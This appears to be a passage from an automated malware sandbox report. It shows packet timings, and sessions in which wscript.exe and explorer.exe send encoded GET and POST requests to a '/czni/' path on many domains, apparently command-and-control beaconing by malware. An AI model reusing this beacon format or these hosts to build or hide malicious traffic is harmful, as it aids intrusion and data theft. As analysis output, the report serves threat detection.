                                                                          Jan 30, 2023 13:39:17.347898006 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347919941 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347920895 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347930908 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347975016 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347982883 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347994089 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.348053932 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.348550081 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.348671913 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.348685980 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.348732948 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.359446049 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.359524012 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.359544992 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.359652042 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:49.999259949 CET4970780192.168.2.514.128.47.126
                                                                          Jan 30, 2023 13:39:50.282299042 CET804970714.128.47.126192.168.2.5
                                                                          Jan 30, 2023 13:39:50.282507896 CET4970780192.168.2.514.128.47.126
                                                                          Jan 30, 2023 13:39:50.282717943 CET4970780192.168.2.514.128.47.126
                                                                          Jan 30, 2023 13:39:50.565741062 CET804970714.128.47.126192.168.2.5
                                                                          Jan 30, 2023 13:39:50.565773010 CET804970714.128.47.126192.168.2.5
                                                                          Jan 30, 2023 13:39:50.565792084 CET804970714.128.47.126192.168.2.5
                                                                          Jan 30, 2023 13:39:50.566077948 CET4970780192.168.2.514.128.47.126
                                                                          Jan 30, 2023 13:39:50.566263914 CET4970780192.168.2.514.128.47.126
                                                                          Jan 30, 2023 13:39:50.849106073 CET804970714.128.47.126192.168.2.5
                                                                          Jan 30, 2023 13:40:00.655260086 CET4970980192.168.2.5194.58.112.174
                                                                          Jan 30, 2023 13:40:00.713217974 CET8049709194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:00.713398933 CET4970980192.168.2.5194.58.112.174
                                                                          Jan 30, 2023 13:40:00.713613987 CET4970980192.168.2.5194.58.112.174
                                                                          Jan 30, 2023 13:40:00.772269011 CET8049709194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:00.773113966 CET8049709194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:00.773145914 CET8049709194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:00.773170948 CET8049709194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:00.773191929 CET8049709194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:00.773272991 CET4970980192.168.2.5194.58.112.174
                                                                          Jan 30, 2023 13:40:00.773344040 CET4970980192.168.2.5194.58.112.174
                                                                          Jan 30, 2023 13:40:02.227529049 CET4970980192.168.2.5194.58.112.174
                                                                          Jan 30, 2023 13:40:03.243913889 CET4971080192.168.2.5194.58.112.174
                                                                          Jan 30, 2023 13:40:03.301846981 CET8049710194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:03.304816008 CET4971080192.168.2.5194.58.112.174
                                                                          Jan 30, 2023 13:40:03.305179119 CET4971080192.168.2.5194.58.112.174
                                                                          Jan 30, 2023 13:40:03.364228964 CET8049710194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:03.364614010 CET8049710194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:03.364670038 CET8049710194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:03.364720106 CET8049710194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:03.364768982 CET8049710194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:03.364819050 CET8049710194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:03.364871979 CET8049710194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:03.364919901 CET8049710194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:03.364938974 CET4971080192.168.2.5194.58.112.174
                                                                          Jan 30, 2023 13:40:03.364969969 CET8049710194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:03.364984989 CET4971080192.168.2.5194.58.112.174
                                                                          Jan 30, 2023 13:40:03.365015030 CET4971080192.168.2.5194.58.112.174
                                                                          Jan 30, 2023 13:40:03.365015984 CET8049710194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:03.365122080 CET4971080192.168.2.5194.58.112.174
                                                                          Jan 30, 2023 13:40:03.365341902 CET4971080192.168.2.5194.58.112.174
                                                                          Jan 30, 2023 13:40:03.424285889 CET8049710194.58.112.174192.168.2.5
                                                                          Jan 30, 2023 13:40:08.575328112 CET4971180192.168.2.5208.91.197.91
                                                                          Jan 30, 2023 13:40:08.721590996 CET8049711208.91.197.91192.168.2.5
                                                                          Jan 30, 2023 13:40:08.721735954 CET4971180192.168.2.5208.91.197.91
                                                                          Jan 30, 2023 13:40:08.721944094 CET4971180192.168.2.5208.91.197.91
                                                                          Jan 30, 2023 13:40:08.868146896 CET8049711208.91.197.91192.168.2.5
                                                                          Jan 30, 2023 13:40:11.245280981 CET4971280192.168.2.5208.91.197.91
                                                                          Jan 30, 2023 13:40:11.393906116 CET8049712208.91.197.91192.168.2.5
                                                                          Jan 30, 2023 13:40:11.394210100 CET4971280192.168.2.5208.91.197.91
                                                                          Jan 30, 2023 13:40:11.394536018 CET4971280192.168.2.5208.91.197.91
                                                                          Jan 30, 2023 13:40:11.543135881 CET8049712208.91.197.91192.168.2.5
                                                                          Jan 30, 2023 13:40:12.377284050 CET8049712208.91.197.91192.168.2.5
                                                                          Jan 30, 2023 13:40:12.377315044 CET8049712208.91.197.91192.168.2.5
                                                                          Jan 30, 2023 13:40:12.377343893 CET8049712208.91.197.91192.168.2.5
                                                                          Jan 30, 2023 13:40:12.377372980 CET8049712208.91.197.91192.168.2.5
                                                                          Jan 30, 2023 13:40:12.377397060 CET8049712208.91.197.91192.168.2.5
                                                                          Jan 30, 2023 13:40:12.377476931 CET4971280192.168.2.5208.91.197.91
                                                                          Jan 30, 2023 13:40:12.377476931 CET4971280192.168.2.5208.91.197.91
                                                                          Jan 30, 2023 13:40:12.377547979 CET4971280192.168.2.5208.91.197.91
                                                                          Jan 30, 2023 13:40:12.377702951 CET4971280192.168.2.5208.91.197.91
                                                                          Jan 30, 2023 13:40:12.425951004 CET8049712208.91.197.91192.168.2.5
                                                                          Jan 30, 2023 13:40:12.426054955 CET4971280192.168.2.5208.91.197.91
                                                                          Jan 30, 2023 13:40:12.525878906 CET8049712208.91.197.91192.168.2.5
                                                                          Jan 30, 2023 13:40:18.940885067 CET4971480192.168.2.566.96.162.149
                                                                          Jan 30, 2023 13:40:19.048115969 CET804971466.96.162.149192.168.2.5
                                                                          Jan 30, 2023 13:40:19.048382998 CET4971480192.168.2.566.96.162.149
                                                                          Jan 30, 2023 13:40:19.048485994 CET4971480192.168.2.566.96.162.149
                                                                          Jan 30, 2023 13:40:19.153172970 CET804971466.96.162.149192.168.2.5
                                                                          Jan 30, 2023 13:40:19.462457895 CET804971466.96.162.149192.168.2.5
                                                                          Jan 30, 2023 13:40:19.462492943 CET804971466.96.162.149192.168.2.5
                                                                          Jan 30, 2023 13:40:19.462577105 CET4971480192.168.2.566.96.162.149
                                                                          Jan 30, 2023 13:40:20.558085918 CET4971480192.168.2.566.96.162.149
                                                                          Jan 30, 2023 13:40:21.574326992 CET4971580192.168.2.566.96.162.149
                                                                          Jan 30, 2023 13:40:21.674606085 CET804971566.96.162.149192.168.2.5
                                                                          Jan 30, 2023 13:40:21.674871922 CET4971580192.168.2.566.96.162.149
                                                                          Jan 30, 2023 13:40:21.675069094 CET4971580192.168.2.566.96.162.149
                                                                          Jan 30, 2023 13:40:21.774648905 CET804971566.96.162.149192.168.2.5
                                                                          Jan 30, 2023 13:40:23.543339968 CET804971566.96.162.149192.168.2.5
                                                                          Jan 30, 2023 13:40:23.543404102 CET804971566.96.162.149192.168.2.5
                                                                          Jan 30, 2023 13:40:23.543687105 CET4971580192.168.2.566.96.162.149
                                                                          Jan 30, 2023 13:40:23.543828964 CET4971580192.168.2.566.96.162.149
                                                                          Jan 30, 2023 13:40:23.644718885 CET804971566.96.162.149192.168.2.5
                                                                          Jan 30, 2023 13:40:29.659159899 CET4971680192.168.2.5137.59.148.248
                                                                          Jan 30, 2023 13:40:29.878974915 CET8049716137.59.148.248192.168.2.5
                                                                          Jan 30, 2023 13:40:29.879267931 CET4971680192.168.2.5137.59.148.248
                                                                          Jan 30, 2023 13:40:29.928004980 CET4971680192.168.2.5137.59.148.248
                                                                          Jan 30, 2023 13:40:30.139357090 CET8049716137.59.148.248192.168.2.5
                                                                          Jan 30, 2023 13:40:30.151243925 CET8049716137.59.148.248192.168.2.5
                                                                          Jan 30, 2023 13:40:30.151274920 CET8049716137.59.148.248192.168.2.5
                                                                          Jan 30, 2023 13:40:30.151480913 CET4971680192.168.2.5137.59.148.248
                                                                          Jan 30, 2023 13:40:31.459575891 CET4971680192.168.2.5137.59.148.248
                                                                          Jan 30, 2023 13:40:34.126940012 CET4971780192.168.2.5137.59.148.248
                                                                          Jan 30, 2023 13:40:34.338074923 CET8049717137.59.148.248192.168.2.5
                                                                          Jan 30, 2023 13:40:34.338272095 CET4971780192.168.2.5137.59.148.248
                                                                          Jan 30, 2023 13:40:34.488315105 CET4971780192.168.2.5137.59.148.248
                                                                          Jan 30, 2023 13:40:34.699570894 CET8049717137.59.148.248192.168.2.5
                                                                          Jan 30, 2023 13:40:34.709826946 CET8049717137.59.148.248192.168.2.5
                                                                          Jan 30, 2023 13:40:34.709883928 CET8049717137.59.148.248192.168.2.5
                                                                          Jan 30, 2023 13:40:34.723557949 CET4971780192.168.2.5137.59.148.248
                                                                          Jan 30, 2023 13:41:36.265997887 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266017914 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266037941 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266062021 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266083002 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266108036 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266134024 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266161919 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266165972 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.266165972 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.266191006 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266208887 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.266239882 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.378217936 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378253937 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378272057 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378290892 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378310919 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378335953 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378355026 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.378361940 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378391027 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378393888 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.378393888 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.378413916 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378434896 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378454924 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.378457069 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378473997 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378494024 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378506899 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378525972 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378550053 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378570080 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.378576994 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378597021 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378618002 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378638983 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378676891 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.378709078 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.490629911 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.490753889 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.490816116 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.490844011 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.490863085 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.490916014 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.490931988 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.490966082 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491017103 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.491045952 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491118908 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491168022 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491172075 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.491236925 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491300106 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.491311073 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491405010 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491457939 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.491503000 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491554976 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491602898 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491617918 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.491652012 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491693974 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491704941 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.491899967 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.492281914 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.604203939 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:46.574623108 CET4973280192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:46.597848892 CET8049732217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:46.598038912 CET4973280192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:46.598280907 CET4973280192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:46.621326923 CET8049732217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:46.629065037 CET8049732217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:46.629133940 CET8049732217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:46.629221916 CET4973280192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:48.102818966 CET4973280192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:49.168648958 CET4973480192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:49.191988945 CET8049734217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:49.192121029 CET4973480192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:49.192296982 CET4973480192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:49.215440035 CET8049734217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:49.222229958 CET8049734217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:49.222260952 CET8049734217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:49.222280025 CET8049734217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:49.222443104 CET4973480192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:49.222493887 CET4973480192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:49.222708941 CET4973480192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:49.245848894 CET8049734217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:54.345222950 CET4973580192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:54.457226992 CET804973567.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:41:54.457503080 CET4973580192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:54.457782984 CET4973580192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:54.568217039 CET804973567.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:41:54.568286896 CET804973567.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:41:54.568422079 CET804973567.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:41:54.568550110 CET4973580192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:55.962604046 CET4973580192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:56.978915930 CET4973680192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:57.088537931 CET804973667.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:41:57.088923931 CET4973680192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:57.089145899 CET4973680192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:57.198584080 CET804973667.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:41:57.198988914 CET804973667.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:41:57.199032068 CET804973667.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:41:57.199181080 CET4973680192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:57.199347973 CET4973680192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:57.308691025 CET804973667.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:42:07.296283007 CET4973780192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:07.322555065 CET8049737185.104.28.238192.168.2.5
                                                                          Jan 30, 2023 13:42:07.322695971 CET4973780192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:07.322936058 CET4973780192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:07.349845886 CET8049737185.104.28.238192.168.2.5
                                                                          Jan 30, 2023 13:42:07.349878073 CET8049737185.104.28.238192.168.2.5
                                                                          Jan 30, 2023 13:42:07.350083113 CET4973780192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:08.838682890 CET4973780192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:09.854974031 CET4973880192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:09.881261110 CET8049738185.104.28.238192.168.2.5
                                                                          Jan 30, 2023 13:42:09.881423950 CET4973880192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:09.881613970 CET4973880192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:09.908283949 CET8049738185.104.28.238192.168.2.5
                                                                          Jan 30, 2023 13:42:09.908348083 CET8049738185.104.28.238192.168.2.5
                                                                          Jan 30, 2023 13:42:09.908580065 CET4973880192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:09.908778906 CET4973880192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:09.935323954 CET8049738185.104.28.238192.168.2.5
                                                                          Jan 30, 2023 13:42:14.945475101 CET4973980192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:14.976012945 CET8049739172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:14.976214886 CET4973980192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:14.977011919 CET4973980192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:15.008919001 CET8049739172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:15.295717955 CET8049739172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:15.295805931 CET8049739172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:15.295852900 CET8049739172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:15.295995951 CET4973980192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:15.296072960 CET8049739172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:15.296471119 CET4973980192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:16.479938984 CET4973980192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:17.496393919 CET4974080192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:17.527112961 CET8049740172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:17.527288914 CET4974080192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:17.527848005 CET4974080192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:17.558413029 CET8049740172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:17.854996920 CET8049740172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:17.855050087 CET8049740172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:17.855070114 CET8049740172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:17.855087042 CET8049740172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:17.855324984 CET4974080192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:17.862265110 CET4974080192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:17.893002987 CET8049740172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:23.068209887 CET4974180192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:23.133913994 CET804974187.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:23.134094954 CET4974180192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:23.134269953 CET4974180192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:23.199517012 CET804974187.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:23.248631001 CET804974187.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:23.248666048 CET804974187.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:23.248795033 CET4974180192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:24.636953115 CET4974180192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:25.652991056 CET4974280192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:25.722660065 CET804974287.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:25.722958088 CET4974280192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:25.723154068 CET4974280192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:25.794202089 CET804974287.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:25.803071976 CET804974287.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:25.803139925 CET804974287.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:25.803452015 CET4974280192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:25.803721905 CET4974280192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:25.873691082 CET804974287.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:31.825979948 CET4974380192.168.2.514.128.47.126
                                                                          Jan 30, 2023 13:42:32.091356039 CET804974314.128.47.126192.168.2.5
                                                                          Jan 30, 2023 13:42:32.091521978 CET4974380192.168.2.514.128.47.126
                                                                          Jan 30, 2023 13:42:32.091612101 CET4974380192.168.2.514.128.47.126
                                                                          Jan 30, 2023 13:42:32.356904984 CET804974314.128.47.126192.168.2.5
                                                                          Jan 30, 2023 13:42:32.356997013 CET804974314.128.47.126192.168.2.5
                                                                          Jan 30, 2023 13:42:32.357069969 CET804974314.128.47.126192.168.2.5
                                                                          Jan 30, 2023 13:42:32.357290983 CET4974380192.168.2.514.128.47.126
                                                                          Jan 30, 2023 13:42:32.358773947 CET4974380192.168.2.514.128.47.126
                                                                          Jan 30, 2023 13:42:32.623991966 CET804974314.128.47.126192.168.2.5
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49703 | 91.227.138.48 | 443 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49707 | 14.128.47.126 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2023 13:39:50.282717943 CET | 745 | OUT | GET /czni/?20=4xfPiv3RnE&z8rul-n=fBMxo69x1QXNWuc9hyM7d4IFsS8MYdi4DQWD1kEEyFhAPfH6LtWDKNH9q/ewbXUtBA348B3g5uC8JLGqihwz/XjbfKo4x0QdAA== HTTP/1.1
                                                                          Host: www.panalobet88.net
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
Jan 30, 2023 13:39:50.565773010 CET | 745 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Mon, 30 Jan 2023 12:39:50 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 146
                                                                          Connection: close
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.5 | 49719 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2023 13:40:48.549119949 CET | 799 | OUT | POST /czni/ HTTP/1.1
                                                                          Host: www.yeah-go.com
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.yeah-go.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.yeah-go.com/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Ascii: z8rul-n=ADzrY5mZnnmA~ovqIIPK3ZrP8sIcYdn6ekFSF8qqnFRXhpjDGfUvq919QQ3YGNHbA0Ye0uJI4A31mSZvrWa_UM1Q2RAj49IGzGQ7b09Mr4AVmbDmSlLrEraxHw(QZo8hsSrggLzK82vR7dshFeMyMevSSdTvZWiHrT932tR9V80_mjDEUg).
Jan 30, 2023 13:40:48.837980986 CET | 800 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:40:48 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Sorting-Hat-PodId: 315
                                                                          X-Sorting-Hat-ShopId: 71134478652
                                                                          Vary: Accept-Encoding
                                                                          Vary: Accept
                                                                          X-Frame-Options: DENY
                                                                          X-ShopId: 71134478652
                                                                          X-ShardId: 315
                                                                          X-Shopify-Generated-Cart-Token: 21c7ae2ca548800573490a93ab93ff69
                                                                          Content-Language: pt-BR
                                                                          Cache-Control: no-store
                                                                          Set-Cookie: localization=BR; path=/; expires=Tue, 30 Jan 2024 12:40:48 GMT; SameSite=Lax
                                                                          Set-Cookie: cart_sig=3daa84b1ccd12f91044bf3d820ae05bb; path=/; expires=Mon, 13 Feb 2023 12:40:48 GMT; HttpOnly; SameSite=Lax
                                                                          Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22BR%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=yeah-go.com; path=/; expires=Tue, 31 Jan 2023 12:40:48 GMT; SameSite=Lax
